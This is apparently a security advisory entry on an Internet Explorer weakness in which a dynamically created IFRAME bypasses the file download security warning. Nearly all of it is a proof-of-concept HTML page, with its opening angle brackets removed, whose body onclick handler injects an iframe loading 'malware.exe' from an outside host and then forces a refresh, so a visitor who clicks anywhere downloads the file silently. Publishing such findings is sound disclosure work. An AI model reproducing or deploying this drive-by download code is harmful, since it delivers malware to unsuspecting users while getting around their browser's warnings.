|
Microsoft Internet Explorer Dynamic IFRAME File Download Security Warning Bypass Weakness
An exploit is not required to leverage this weakness. The following proof of concept is available: Paste into an htm/html file and add "<" at the begining of each line: ------------------------ cut here -------------------------------------- !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> !-- saved from url=(0031)http://theinsider.deep-ice.com/ --> HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com</TITLE> META http-equiv=expires content="01 Jan 1998 01:01:00 GMT"> META http-equiv=Content-Type content="text/html; charset=windows-1252"> META http-equiv=Content-Language content=en-us> META content=True name=HandheldFriendly> META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD> embed> body onclick='a=document.createElement("\<iframe src=\"http:\/ \/theinsider.deep- ice.com\/malware.exe\"\>\<\/iframe\>");document.body.appendChild (a);setTimeout("document.execCommand\(\"refresh\")",1000)'> cebter><br><br><br><br><br><br>Click AnyWhere You Want</cen ter> /BODY></HTML> |
|
|
Privacy Statement |
